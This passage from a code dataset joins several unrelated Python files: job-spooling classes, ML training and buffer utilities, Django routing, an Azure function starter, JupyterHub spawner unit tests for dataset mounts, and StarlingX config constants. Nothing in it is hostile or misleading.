# this fixes the bug that `Command` would end up in the resulting Tcl
# causing a `SEVERE tractor_spool problem (ingress rc = 1)`
cmdtype = "Cmd" # <- "Command"
else:
cmdtype = "RemoteCmd"
attributes = [
Constant(cmdtype),
ArgvAttribute("argv", required=True, suppressTclKey=True),
StringAttribute("msg"),
StringListAttribute("tags"),
StringAttribute("service"),
StringAttribute("metrics"),
StringAttribute("id"),
StringAttribute("refersto"),
BooleanAttribute("expand"),
IntAttribute("atleast"),
IntAttribute("atmost"),
IntAttribute("minrunsecs"),
IntAttribute("maxrunsecs"),
BooleanAttribute("samehost"),
StringListAttribute("envkey"),
IntListAttribute("retryrc"),
WhenStringAttribute("when"),
StringListAttribute("resumewhile"),
BooleanAttribute("resumepin"),
StringAttribute("metadata")
]
super(Command, self).__init__(attributes, **kw)
| StarcoderdataPython |
1785024 | <gh_stars>10-100
import numpy as np
from collections import deque
class HistoryBuffer():
def __init__(self,preprocess_fn,image_shape,frames_for_state) :
self.buf = deque(maxlen=frames_for_state)
self.preprocess_fn = preprocess_fn
self.image_shape = image_shape
self.clear()
def clear(self) :
for i in range(self.buf.maxlen):
self.buf.append(np.zeros(self.image_shape,np.float32))
def add(self,o) :
#assert( list(o.shape) == self.image_shape ),'%s, %s'%(o.shape,self.image_shape)
self.buf.append(self.preprocess_fn(o))
state = np.concatenate([img for img in self.buf], axis=2)
return state
| StarcoderdataPython |
1732257 | from django.conf.urls import include
from django.conf.urls import patterns
from django.contrib import admin
from survey.urls import urlpatterns as survey_urls
from django.conf import settings
from django.conf.urls import (handler400, handler403, handler404, handler500)
admin.autodiscover()
urlpatterns = patterns('',
(r'^admin/', include(admin.site.urls)),
(r'^admin/rq/', include('django_rq_dashboard.urls'))
) + survey_urls
handler400 = 'survey.views.home_page.custom_400'
handler403 = 'survey.views.home_page.custom_403'
handler404 = 'survey.views.home_page.custom_404'
handler500 = 'survey.views.home_page.custom_500'
| StarcoderdataPython |
3205580 | <filename>blueprints/azure_functions/management/start_function.py<gh_stars>10-100
"""
Start an azure function.
"""
from common.methods import set_progress
from infrastructure.models import CustomField
from common.methods import generate_string_from_template
import os, json
def run(job, resource, **kwargs):
function_name = resource.attributes.get(field__name='azure_function_name').value
function_resource_group = resource.attributes.get(field__name='resource_group_name').value
set_progress('Starting the function...')
try:
start_function_command = "az functionapp start --name {0} --resource-group {1}".format(function_name, function_resource_group)
os.system(start_function_command)
except Exception:
return "FAILURE", "The function app could not be started", ""
return "SUCCESS", "The function app was succesfully started.", "" | StarcoderdataPython |
3279072 | from algo.number_theory.ncr.ncr import ncr
def ncr_lucas(n, r, pmod):
"""
Complexity -> O(logn base pmod).
"""
if r == 0:
return 1
next_n, n = divmod(n, pmod)
next_r, r = divmod(r, pmod)
return ncr(n, r, pmod) * ncr_lucas(next_n, next_r, pmod) % pmod
def main():
print(ncr_lucas(10, 5, 1000000007))
if __name__ == "__main__":
main()
| StarcoderdataPython |
3577 | """
# Definition for a Node.
"""
class TreeNode(object):
def __init__(self, val, children):
self.val = val
self.children = children
class Solution(object):
def levelOrder(self, root):
"""
:type root: Node
:rtype: List[List[int]]
"""
if root is None:
return []
from Queue import Queue
que = Queue()
que.put(root)
ans, tmp, k = [], [], 1
while que.qsize() != 0:
node = que.get()
tmp.append(node.val)
k -= 1
for child in node.children:
que.put(child)
if k == 0:
k = que.qsize()
ans.append(list(tmp))
tmp = []
return ans
node2 = TreeNode(2, [])
node3 = TreeNode(3, [])
children = [node2, node3]
node1 = TreeNode(1, children)
solution = Solution()
print(solution.levelOrder(node1))
| StarcoderdataPython |
1763427 | from dataclasses import dataclass
@dataclass
class JupyterAPI:
host: str = "127.0.0.1"
port: int = 8888
token: str = ""
| StarcoderdataPython |
1603773 | from collections import deque
d = deque()
N = int(input())
for _ in range(N):
cmd, *args = input().split()
getattr(d, cmd)(*args)
print (*[item for item in d], sep = " ")
| StarcoderdataPython |
3366626 | # -*- coding: utf-8 -*-
"""
@date: 2021/9/25 下午12:16
@file: resnet.py
@author: zj
@description:
"""
import torch
from rfd.model.resnet.resnet import get_resnet
from rfd.config.key_word import KEY_FEAT
if __name__ == '__main__':
# model = get_resnet(arch='resnet18')
model = get_resnet(arch='resnet50')
print(model.get_distill_channels())
data = torch.randn(1, 3, 224, 224)
res_dict = model(data)
for feats in res_dict[KEY_FEAT]:
print(feats.shape)
print(model.get_distill_channels())
| StarcoderdataPython |
3244909 | from typing import Callable
import torch
from torch import nn
from torch.optim import Optimizer
from torch.optim.lr_scheduler import _LRScheduler
from tqdm import tqdm
from ..chemprop.data import MoleculeDataLoader
from ..chemprop.nn_utils import compute_gnorm, compute_pnorm, NoamLR
def train(model: nn.Module, data_loader: MoleculeDataLoader,
loss_func: Callable, optimizer: Optimizer,
scheduler: _LRScheduler, uncertainty: bool,
n_iter: int = 0, disable: bool = False) -> int:
"""Trains a model for an epoch
Parameters
----------
model : nn.Module
the model to train
data_loader : MoleculeDataLoader
an iterable of MoleculeDatasets
loss_func : Callable
the loss function
optimizer : Optimizer
the optimizer
scheduler : _LRScheduler
the learning rate scheduler
uncertainty : bool
whether the model predicts its own uncertainty
n_iter : int, default=0
the current number of training iterations
disable : bool, default=False
whether to disable the progress bar
Returns
-------
n_iter : int
The total number of samples trained on so far
"""
model.train()
# loss_sum = 0
# iter_count = 0
for batch in tqdm(data_loader, desc='Training', unit='step',
leave=False, disable=disable,):
# Prepare batch
mol_batch, targets = batch#.batch_graph()
# features_batch = batch.features()
# Run model
model.zero_grad()
preds = model(mol_batch)#, features_batch)
# targets = batch.targets() # targets might have None's
mask = torch.tensor(
[list(map(bool, ys)) for ys in targets]
).to(preds.device)
targets = torch.tensor(
[[y or 0 for y in ys] for ys in targets]
).to(preds.device)
class_weights = torch.ones(targets.shape).to(preds.device)
# if args.dataset_type == 'multiclass':
# targets = targets.long()
# loss = (torch.cat([
# loss_func(preds[:, target_index, :],
# targets[:, target_index]).unsqueeze(1)
# for target_index in range(preds.size(1))
# ], dim=1) * class_weights * mask
# )
if uncertainty:
pred_means = preds[:, 0::2]
pred_vars = preds[:, 1::2]
loss = loss_func(pred_means, pred_vars, targets)
else:
loss = loss_func(preds, targets) * class_weights * mask
loss = loss.sum() / mask.sum()
# loss_sum += loss.item()
# iter_count += len(batch)
loss.backward()
optimizer.step()
if isinstance(scheduler, NoamLR):
scheduler.step()
n_iter += len(batch)
# Log and/or add to tensorboard
# if (n_iter // args.batch_size) % args.log_frequency == 0:
# lrs = scheduler.get_lr()
# pnorm = compute_pnorm(model)
# gnorm = compute_gnorm(model)
# loss_avg = loss_sum / iter_count
# loss_sum, iter_count = 0, 0
# lrs_str = ', '.join(
# f'lr_{i} = {lr:.4e}' for i, lr in enumerate(lrs))
# debug(f'Loss = {loss_avg:.4e}, PNorm = {pnorm:.4f}, '
# + f'GNorm = {gnorm:.4f}, {lrs_str}')
# if writer:
# writer.add_scalar('train_loss', loss_avg, n_iter)
# writer.add_scalar('param_norm', pnorm, n_iter)
# writer.add_scalar('gradient_norm', gnorm, n_iter)
# for i, lr in enumerate(lrs):
# writer.add_scalar(f'learning_rate_{i}', lr, n_iter)
return n_iter
| StarcoderdataPython |
3295283 | import unittest
from unittest import mock
import copy
from tornado import gen
from tornado import testing
from jupyterhub_profiles import PrimeHubSpawner, OIDCAuthenticator
import jupyterhub
def mock_spawner():
return PrimeHubSpawner(_mock=True)
class AuthStateBuilder(object):
def __init__(self):
import uuid
self.data = dict(sub=uuid.uuid4().hex,
roles=[
"offline_access",
"uma_authorization",
"img:base-notebook",
"it:cpu-only"
], email_verified=True, preferred_username="tester")
self.data['quota'] = dict(gpu=0)
self.data['project-quota'] = dict(gpu=0)
self.launch_context = dict(groups=[])
self.data['groups'] = []
self._datasets_builder = _DatasetsBuilder()
self.add_group('everyone')
self.add_group('phusers')
def add_group(self, name, **kwargs):
self.launch_context['groups'].append(dict(name=name, datasets=[], **kwargs))
self.data['groups'].append("/%s" % name)
def add_dataset_role(self, group_name, name, dataset_type, **kwargs):
if "/%s" % group_name in self.data['groups']:
self.data['roles'].append("ds:%s" % name)
if 'git' == dataset_type:
ds = self._datasets_builder.add_git(name, **kwargs).data[-1]
if 'pv' == dataset_type:
ds = self._datasets_builder.add_pv(name, **kwargs).data[-1]
if 'hostPath' == dataset_type:
ds = self._datasets_builder.add_hostpath(name, **kwargs).data[-1]
if 'nfs' == dataset_type:
ds = self._datasets_builder.add_nfs(name, **kwargs).data[-1]
if 'env' == dataset_type:
ds = self._datasets_builder.add_env(name, **kwargs).data[-1]
ds = copy.deepcopy(ds)
ds['name'] = ds['metadata']['name']
ds['global'] = kwargs.get('dataset_global', False)
ds['writable'] = kwargs.get('writable', False)
del ds['metadata']
for g in self.launch_context['groups']:
if g['name'] == group_name:
g['datasets'].append(ds)
return self
def add_image_role(self, name):
self.data['roles'].append("img:%s" % name)
return self
def add_instance_type_role(self, name):
self.data['roles'].append("it:%s" % name)
return self
@gen.coroutine
def get_oauth_user(self):
return self.data
@gen.coroutine
def get_launch_context(self):
return self.launch_context
def get_datasets(self):
return self._datasets_builder.get_datasets()
def get_auth_state(self):
return dict(
launch_context=self.get_launch_context(),
oauth_user=self.get_oauth_user())
class _DatasetsBuilder(object):
def __init__(self):
self.data = []
def _template(self, name, **kwargs):
tpl = dict(metadata=dict(name=name, annotations=dict()),
spec=dict(description="", displayName=name, type="", url="", variables=dict(), volumeName=""))
for k, v in kwargs.items():
tpl['metadata']['annotations']["dataset.primehub.io/%s" % k] = v
return tpl
def add_git(self, name, **kwargs):
tpl = self._template(name, **kwargs)
tpl['metadata']['annotations']['primehub-gitsync'] = True
tpl['spec']['type'] = 'git'
self.data.append(tpl)
return self
def add_pv(self, name, **kwargs):
tpl = self._template(name, **kwargs)
tpl['spec']['type'] = 'pv'
tpl['spec']['volumeName'] = kwargs['volumeName']
self.data.append(tpl)
return self
def add_hostpath(self, name, **kwargs):
tpl = self._template(name, **kwargs)
tpl['spec']['type'] = 'hostPath'
tpl['spec']['hostPath'] = {'path': kwargs['path']}
self.data.append(tpl)
return self
def add_nfs(self, name, **kwargs):
tpl = self._template(name, **kwargs)
tpl['spec']['type'] = 'nfs'
tpl['spec']['nfs'] = {'path': kwargs['path'], 'server': kwargs['server']}
self.data.append(tpl)
return self
def add_env(self, name, **kwargs):
tpl = self._template(name, **kwargs)
tpl['spec']['type'] = 'env'
del tpl['metadata']['annotations']
for k, v in kwargs.items():
tpl['spec']['variables']['%s' % k] = v
self.data.append(tpl)
return self
def get_datasets(self):
return self.data
class FakeAuthenticator(OIDCAuthenticator):
def user_volume_capacity(self, auth_state):
return None
def get_custom_resources(self, namespace, plural):
return self.datasets
class TestPreSpawner(testing.AsyncTestCase):
def setUp(self):
testing.AsyncTestCase.setUp(self)
self.spawner = mock_spawner()
# user select phusers group
self.spawner.user_options['group'] = dict(name='phusers')
self.builder = AuthStateBuilder()
self.spawner.user.get_auth_state = mock.Mock()
self.spawner.user.get_auth_state.return_value = self.builder.get_auth_state()
self.authenticator = FakeAuthenticator()
self.authenticator.datasets = self.builder.get_datasets()
def get_ln_command(self):
ln_command = self.spawner.singleuser_lifecycle_hooks['postStart']['exec']['command']
ln_command = [x.strip() for x in ln_command[-1].split(';')]
return ln_command
@testing.gen_test
async def test_group_share_volume_mount(self):
self.builder.add_group('i_have_a_volume', enabledSharedVolume=True, sharedVolumeCapacity=100, launchGroupOnly=False)
self.authenticator.attach_project_pvc = mock.Mock(return_value=None)
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertIn("/project/i-have-a-volume", self.authenticator.chown_extra)
@testing.gen_test
async def test_spawan_without_global_dataset(self):
del self.builder.launch_context['groups'][0]['datasets']
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertEqual([{'configMap': {'defaultMode': 511, 'name': 'primehub-start-notebook'},
'name': 'primehub-start-notebook'}], self.spawner.volumes)
@testing.gen_test
async def test_git_mount_without_annotations(self):
"""
gitSyncHostRoot : None => /home/dataset/
gitSyncRoot : None => /gitsync/
mountRoot : None => /datasets/
"""
# add dataset foo without annotations
self.builder.add_dataset_role(
group_name='phusers', dataset_type='git', name='foo')
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertEqual("/home/dataset/foo",
self.spawner.volumes[0]['hostPath']['path'])
self.assertEqual(
"/gitsync/foo", self.spawner.volume_mounts[0]['mountPath'])
# check symbolic link
self.assertIn("ln -sf /gitsync/foo/foo /datasets/foo",
self.get_ln_command())
self.assertNotIn("ln -sf /gitsync/foo/foo /home/jovyan/", self.get_ln_command())
@testing.gen_test
async def test_git_mount_with_annotations_and_not_ending_slash(self):
"""
gitSyncHostRoot : /home/dataset
gitSyncRoot : /gitsync
mountRoot : /datasets
"""
annotations = dict(gitSyncHostRoot='/home/dataset',
gitSyncRoot='/gitsync', mountRoot='/datasets')
self.builder.add_dataset_role(
group_name='phusers', dataset_type='git', name='foo', **annotations)
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertEqual("/home/dataset/foo",
self.spawner.volumes[0]['hostPath']['path'])
self.assertEqual(
"/gitsync/foo", self.spawner.volume_mounts[0]['mountPath'])
# check symbolic link
self.assertIn("ln -sf /gitsync/foo/foo /datasets/foo",
self.get_ln_command())
self.assertNotIn("ln -sf /gitsync/foo/foo .", self.get_ln_command())
@testing.gen_test
async def test_pv_mount_without_annotations(self):
"""
mountRoot : None => /datasets/
homeSymlink : None => 'false'
"""
# add dataset foo without annotations
self.builder.add_dataset_role(
group_name='phusers', dataset_type='pv', name='foo', **dict(volumeName='foo'))
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertEqual("dataset-foo", self.spawner.volumes[0]['name'])
self.assertEqual(
"dataset-foo", self.spawner.volumes[0]['persistentVolumeClaim']['claimName'])
self.assertEqual(
"/datasets/foo", self.spawner.volume_mounts[0]['mountPath'])
# check symbolic link
self.assertIn("ln -sf /datasets /home/jovyan/", self.get_ln_command())
self.assertNotIn("ln -sf /datasets/foo /home/jovyan/", self.get_ln_command())
@testing.gen_test
async def test_pv_mount_with_annotations_enable_home_symlink_and_without_ending_slash(self):
"""
mountRoot : /datasets
homeSymlink : 'true'
"""
annotations = dict(mountRoot='/datasets',
homeSymlink='true', volumeName='foo')
self.builder.add_dataset_role(
group_name='phusers', dataset_type='pv', name='foo', **annotations)
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertEqual("dataset-foo", self.spawner.volumes[0]['name'])
self.assertEqual(
"dataset-foo", self.spawner.volumes[0]['persistentVolumeClaim']['claimName'])
self.assertEqual(
"/datasets/foo", self.spawner.volume_mounts[0]['mountPath'])
# check symbolic link
self.assertIn("ln -sf /datasets /home/jovyan/", self.get_ln_command())
self.assertIn("ln -sf /datasets/foo /home/jovyan/", self.get_ln_command())
@testing.gen_test
async def test_dataset_not_in_launch_context_groups_bind_and_not_global(self):
"""
mountRoot : /datasets
homeSymlink : 'true'
launchGroupOnly : 'false'
"""
annotations = dict(mountRoot='/datasets',
launchGroupOnly='false',
homeSymlink='true', volumeName='foo')
self.builder.add_dataset_role(group_name='others', name='ds_other', dataset_type='pv', writable=False, dataset_global=False, **annotations)
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
# Shouldn't mount if dataset is not in users' group set and not global
self.assertEqual(1, len(self.spawner.volumes))
@testing.gen_test
async def test_dataset_without_group_bind_but_global_and_launchGroupOnly(self):
"""
mountRoot : /datasets
homeSymlink : 'true'
launchGroupOnly : 'true'
"""
annotations = dict(mountRoot='/datasets',
launchGroupOnly='true',
homeSymlink='true', volumeName='foo')
self.builder.add_dataset_role(group_name='everyone', name='ds_global', dataset_type='pv', writable=False, dataset_global=True, **annotations)
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
# Shouldn't mount if dataset is not in users' group set and not global
self.assertEqual(2, len(self.spawner.volumes))
self.assertEqual(True, self.spawner.volumes[0]['persistentVolumeClaim']['readOnly'])
@testing.gen_test
async def test_dataset_global_not_in_launch_group(self):
"""
global=true
writable=true
mountRoot : /datasets
homeSymlink : 'true'
launchGroupOnly : 'false'
"""
annotations = dict(mountRoot='/datasets',
launchGroupOnly='false',
homeSymlink='true', volumeName='foo')
self.builder.add_dataset_role(group_name='everyone', name='ds_global', dataset_type='pv', writable=True, dataset_global=True, **annotations)
self.builder.add_dataset_role(group_name='everyone', name='ds_global_readonly', dataset_type='pv', writable=False, dataset_global=True, **annotations)
# This one shouldn't mount.
self.builder.add_dataset_role(group_name='other', name='other_ds', dataset_type='pv', writable=False, dataset_global=True, **annotations)
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertEqual(3, len(self.spawner.volumes))
# Writable
self.assertEqual('dataset-ds_global', self.spawner.volumes[0]['name'])
self.assertEqual(False, self.spawner.volumes[0]['persistentVolumeClaim']['readOnly'])
# ReadOnly
self.assertEqual('dataset-ds_global_readonly', self.spawner.volumes[1]['name'])
self.assertEqual(True, self.spawner.volumes[1]['persistentVolumeClaim']['readOnly'])
@testing.gen_test
async def test_hostpath_mount_without_annotations(self):
"""
mountRoot : None => /datasets/
homeSymlink : None => 'false'
"""
# add dataset foo without annotations
self.builder.add_dataset_role(
group_name='phusers', dataset_type='hostPath', name='foo', **dict(path='/tmp/foobar'))
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertEqual("dataset-foo", self.spawner.volumes[0]['name'])
self.assertEqual(
"/tmp/foobar", self.spawner.volumes[0]['hostPath']['path'])
self.assertEqual(
"/datasets/foo", self.spawner.volume_mounts[0]['mountPath'])
# check symbolic link
self.assertIn("ln -sf /datasets /home/jovyan/", self.get_ln_command())
self.assertNotIn("ln -sf /datasets/foo /home/jovyan/", self.get_ln_command())
@testing.gen_test
async def test_hostpath_mount_with_annotations_enable_home_symlink(self):
"""
mountRoot : None => /datasets/
homeSymlink : None => 'true'
"""
# add dataset foo with annotations
annotations = dict(mountRoot='/datasets',
homeSymlink='true', path='/tmp/foobar')
self.builder.add_dataset_role(
group_name='phusers', dataset_type='hostPath', name='foo', **annotations)
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertEqual("dataset-foo", self.spawner.volumes[0]['name'])
self.assertEqual(
"/tmp/foobar", self.spawner.volumes[0]['hostPath']['path'])
self.assertEqual(
"/datasets/foo", self.spawner.volume_mounts[0]['mountPath'])
# check symbolic link
self.assertIn("ln -sf /datasets /home/jovyan/", self.get_ln_command())
self.assertIn("ln -sf /datasets/foo /home/jovyan/", self.get_ln_command())
@testing.gen_test
async def test_nfs_mount_without_annotations(self):
"""
mountRoot : None => /datasets/
homeSymlink : None => 'false'
"""
# add dataset foo without annotations
self.builder.add_dataset_role(
group_name='phusers', dataset_type='nfs', name='foo', **dict(path='/', server='10.0.0.1'))
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertEqual("dataset-foo", self.spawner.volumes[0]['name'])
self.assertEqual(
"/", self.spawner.volumes[0]['nfs']['path'])
self.assertEqual(
"10.0.0.1", self.spawner.volumes[0]['nfs']['server'])
self.assertEqual(
"/datasets/foo", self.spawner.volume_mounts[0]['mountPath'])
# check symbolic link
self.assertIn("ln -sf /datasets /home/jovyan/", self.get_ln_command())
self.assertNotIn("ln -sf /datasets/foo /home/jovyan/", self.get_ln_command())
@testing.gen_test
async def test_nfs_mount_with_annotations_enable_home_symlink(self):
"""
mountRoot : None => /datasets/
homeSymlink : None => 'true'
"""
# add dataset foo with annotations
annotations = dict(mountRoot='/datasets',
homeSymlink='true', path='/', server='10.0.0.1')
self.builder.add_dataset_role(
group_name='phusers', dataset_type='nfs', name='foo', **annotations)
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertEqual("dataset-foo", self.spawner.volumes[0]['name'])
self.assertEqual(
"/", self.spawner.volumes[0]['nfs']['path'])
self.assertEqual(
"10.0.0.1", self.spawner.volumes[0]['nfs']['server'])
self.assertEqual(
"/datasets/foo", self.spawner.volume_mounts[0]['mountPath'])
# check symbolic link
self.assertIn("ln -sf /datasets /home/jovyan/", self.get_ln_command())
self.assertIn("ln -sf /datasets/foo /home/jovyan/", self.get_ln_command())
def test_mount_env_datasets_launch_group_only(self):
options = dict(launchGroupOnly='true',
FOO='bar')
auth_state = dict(
launch_context=self.builder.launch_context,
oauth_user=self.builder.data
)
self.builder.add_dataset_role(
group_name='fake_group', name='fake_project', dataset_type='env', dataset_global=False, writable=True, **options)
global_datasets = self.authenticator.get_global_datasets(auth_state['launch_context']['groups'])
datasets_in_launch_group = self.authenticator.get_datasets_in_launch_group(
launch_group_name='fake_group', auth_state=auth_state)
result = self.authenticator.mount_dataset(self.spawner, global_datasets, datasets_in_launch_group, 'fake_project', self.builder.get_datasets()[0])
self.assertEqual(result, True)
self.assertEqual(self.spawner.environment.get('FAKE_PROJECT_FOO'), 'bar')
def test_mount_git_datasets_not_global_and_not_in_launch_group(self):
annotations = dict(mountRoot='/datasets',
launchGroupOnly='true',
homeSymlink='true', volumeName='foo')
auth_state = dict(
launch_context=self.builder.launch_context,
oauth_user=self.builder.data
)
self.authenticator.symlinks = []
self.authenticator.chown_extra = []
self.builder.add_dataset_role(
group_name='fake_group', name='fake_project', dataset_type='git', dataset_global=False, writable=True, **annotations)
global_datasets = self.authenticator.get_global_datasets(auth_state['launch_context']['groups'])
datasets_in_launch_group = self.authenticator.get_datasets_in_launch_group(
launch_group_name='phusers', auth_state=auth_state)
result = self.authenticator.mount_dataset(self.spawner, global_datasets, datasets_in_launch_group, 'fake_project', self.builder.get_datasets()[0])
self.assertEqual(result, False)
def test_mount_git_datasets_not_global_and_but_in_launch_group(self):
annotations = dict(mountRoot='/datasets',
launchGroupOnly='true',
homeSymlink='true', volumeName='foo')
auth_state = dict(
launch_context=self.builder.launch_context,
oauth_user=self.builder.data
)
self.authenticator.symlinks = []
self.authenticator.chown_extra = []
self.builder.add_dataset_role(
group_name='phusers', name='fake_project', dataset_type='git', dataset_global=False, writable=True, **annotations)
global_datasets = self.authenticator.get_global_datasets(auth_state['launch_context']['groups'])
datasets_in_launch_group = self.authenticator.get_datasets_in_launch_group(
launch_group_name='phusers', auth_state=auth_state)
result = self.authenticator.mount_dataset(self.spawner, global_datasets, datasets_in_launch_group, 'fake_project', self.builder.get_datasets()[0])
self.assertEqual(result, True)
def test_mount_datasets_is_global(self):
annotations = dict(mountRoot='/datasets',
homeSymlink='true', volumeName='foo')
auth_state = dict(
launch_context=self.builder.launch_context,
oauth_user=self.builder.data
)
self.authenticator.symlinks = []
self.authenticator.chown_extra = []
self.builder.add_dataset_role(
group_name='everyone', name='fake_global', dataset_type='git', dataset_global=True, writable=True, **annotations)
global_datasets = self.authenticator.get_global_datasets(auth_state['launch_context']['groups'])
datasets_in_launch_group = self.authenticator.get_datasets_in_launch_group(
launch_group_name='read_only_group', auth_state=auth_state)
result = self.authenticator.mount_dataset(self.spawner, global_datasets, datasets_in_launch_group, 'fake_global', self.builder.get_datasets()[0])
self.assertEqual(result, True)
def test_get_datasets_in_launch_group(self):
self.builder.add_group('read_only_group')
annotations = dict(mountRoot='/datasets',
homeSymlink='true', volumeName='foo')
auth_state = dict(
launch_context=self.builder.launch_context,
oauth_user=self.builder.data
)
self.builder.add_dataset_role(
group_name='read_only_group', name='foo', dataset_type='pv', writable=True, **annotations)
datasets_in_launch_group = self.authenticator.get_datasets_in_launch_group(
launch_group_name='read_only_group', auth_state=auth_state)
self.assertEqual(datasets_in_launch_group.get('foo').get('writable'), True)
def test_get_datasets_in_launch_group_without_right_group(self):
auth_state = dict(
launch_context=self.builder.launch_context,
oauth_user=self.builder.data
)
annotations = dict(mountRoot='/datasets',
launchGroupOnly='false',
homeSymlink='true', volumeName='foo')
self.builder.add_dataset_role(
group_name='read_only_group', name='foo-test', dataset_type='pv', dataset_global=True, writable=True, **annotations)
datasets_in_launch_group = self.authenticator.get_datasets_in_launch_group(
launch_group_name='read_only_group', auth_state=auth_state)
self.assertEqual({}, datasets_in_launch_group)
def test_get_global_datasets(self):
self.builder.add_group('read_only_group')
annotations = dict(mountRoot='/datasets',
homeSymlink='true', volumeName='foo')
self.builder.add_dataset_role(
group_name='read_only_group', name='foo_global', dataset_type='pv', writable=True, dataset_global=True, **annotations)
self.builder.add_dataset_role(
group_name='read_only_group', name='foo_private', dataset_type='pv', writable=True, dataset_global=False, **annotations)
auth_state = dict(
launch_context=self.builder.launch_context,
oauth_user=self.builder.data
)
self.assertNotEqual(self.authenticator.get_global_datasets(auth_state['launch_context']['groups']).get('foo_global', None), None)
self.assertEqual(self.authenticator.get_global_datasets(auth_state['launch_context']['groups']).get('foo_private', None), None)
@testing.gen_test
async def test_safe_mode_feature(self):
# verify default behavior: safe_mode=False
self.spawner.volume_mounts.append({'mountPath': '/home/jovyan'})
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertEqual({'mountPath': '/home/jovyan'}, self.spawner.volume_mounts[0])
self.spawner.enable_safe_mode = True
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertEqual({'mountPath': '/home/jovyan/user'}, self.spawner.volume_mounts[0])
| StarcoderdataPython |
3302997 | from channels.auth import AuthMiddlewareStack
from channels.routing import ProtocolTypeRouter, URLRouter
import session.routing as rout
application = ProtocolTypeRouter({
# http->django views is added by default
'websocket': AuthMiddlewareStack(
URLRouter(
rout.websocket_urlpatterns
)
),
})
| StarcoderdataPython |
1739146 | <reponame>etaivan/stx-config
#
# Copyright (c) 2016-2018 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
from sysinv.common import constants as sysinv_constants
from tsconfig import tsconfig
CONFIG_WORKDIR = '/tmp/config'
CGCS_CONFIG_FILE = CONFIG_WORKDIR + '/cgcs_config'
CONFIG_PERMDIR = tsconfig.CONFIG_PATH
HIERADATA_WORKDIR = '/tmp/hieradata'
HIERADATA_PERMDIR = tsconfig.PUPPET_PATH + 'hieradata'
KEYRING_WORKDIR = '/tmp/python_keyring'
KEYRING_PERMDIR = tsconfig.KEYRING_PATH
INITIAL_CONFIG_COMPLETE_FILE = '/etc/platform/.initial_config_complete'
CONFIG_FAIL_FILE = '/var/run/.config_fail'
COMMON_CERT_FILE = "/etc/ssl/private/server-cert.pem"
FIREWALL_RULES_FILE = '/etc/platform/iptables.rules'
OPENSTACK_PASSWORD_RULES_FILE = '/etc/keystone/password-rules.conf'
INSTALLATION_FAILED_FILE = '/etc/platform/installation_failed'
BACKUPS_PATH = '/opt/backups'
INTERFACES_LOG_FILE = "/tmp/configure_interfaces.log"
TC_SETUP_SCRIPT = '/usr/local/bin/cgcs_tc_setup.sh'
LINK_MTU_DEFAULT = "1500"
CINDER_LVM_THIN = "thin"
CINDER_LVM_THICK = "thick"
DEFAULT_IMAGE_STOR_SIZE = \
sysinv_constants.DEFAULT_IMAGE_STOR_SIZE
DEFAULT_DATABASE_STOR_SIZE = \
sysinv_constants.DEFAULT_DATABASE_STOR_SIZE
DEFAULT_IMG_CONVERSION_STOR_SIZE = \
sysinv_constants.DEFAULT_IMG_CONVERSION_STOR_SIZE
DEFAULT_SMALL_IMAGE_STOR_SIZE = \
sysinv_constants.DEFAULT_SMALL_IMAGE_STOR_SIZE
DEFAULT_SMALL_DATABASE_STOR_SIZE = \
sysinv_constants.DEFAULT_SMALL_DATABASE_STOR_SIZE
DEFAULT_SMALL_IMG_CONVERSION_STOR_SIZE = \
sysinv_constants.DEFAULT_SMALL_IMG_CONVERSION_STOR_SIZE
DEFAULT_SMALL_BACKUP_STOR_SIZE = \
sysinv_constants.DEFAULT_SMALL_BACKUP_STOR_SIZE
DEFAULT_VIRTUAL_IMAGE_STOR_SIZE = \
sysinv_constants.DEFAULT_VIRTUAL_IMAGE_STOR_SIZE
DEFAULT_VIRTUAL_DATABASE_STOR_SIZE = \
sysinv_constants.DEFAULT_VIRTUAL_DATABASE_STOR_SIZE
DEFAULT_VIRTUAL_IMG_CONVERSION_STOR_SIZE = \
sysinv_constants.DEFAULT_VIRTUAL_IMG_CONVERSION_STOR_SIZE
DEFAULT_VIRTUAL_BACKUP_STOR_SIZE = \
sysinv_constants.DEFAULT_VIRTUAL_BACKUP_STOR_SIZE
DEFAULT_EXTENSION_STOR_SIZE = \
sysinv_constants.DEFAULT_EXTENSION_STOR_SIZE
SYSTEM_CONFIG_TIMEOUT = 300
SERVICE_ENABLE_TIMEOUT = 180
MINIMUM_ROOT_DISK_SIZE = 500
MAXIMUM_CGCS_LV_SIZE = 500
LDAP_CONTROLLER_CONFIGURE_TIMEOUT = 30
WRSROOT_MAX_PASSWORD_AGE = 45 # 45 days
LAG_MODE_ACTIVE_BACKUP = "active-backup"
LAG_MODE_BALANCE_XOR = "balance-xor"
LAG_MODE_8023AD = "802.3ad"
LAG_TXHASH_LAYER2 = "layer2"
LAG_MIIMON_FREQUENCY = 100
LOOPBACK_IFNAME = 'lo'
DEFAULT_MULTICAST_SUBNET_IPV4 = '172.16.31.10/28'
DEFAULT_MULTICAST_SUBNET_IPV6 = 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b:1:0/124'
DEFAULT_MGMT_ON_LOOPBACK_SUBNET_IPV4 = '192.168.204.0/28'
DEFAULT_REGION_NAME = "RegionOne"
DEFAULT_SERVICE_PROJECT_NAME = "services"
SSH_WARNING_MESSAGE = "WARNING: Command should only be run from the " \
"console. Continuing with this terminal may cause " \
"loss of connectivity and configuration failure."
SSH_ERROR_MESSAGE = "ERROR: Command should only be run from the console."
| StarcoderdataPython |
1673923 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import lldb
import re
import optparse
import ds
import shlex
class GlobalOptions(object):
symbols = {}
@staticmethod
def addSymbols(symbols, options, breakpoint):
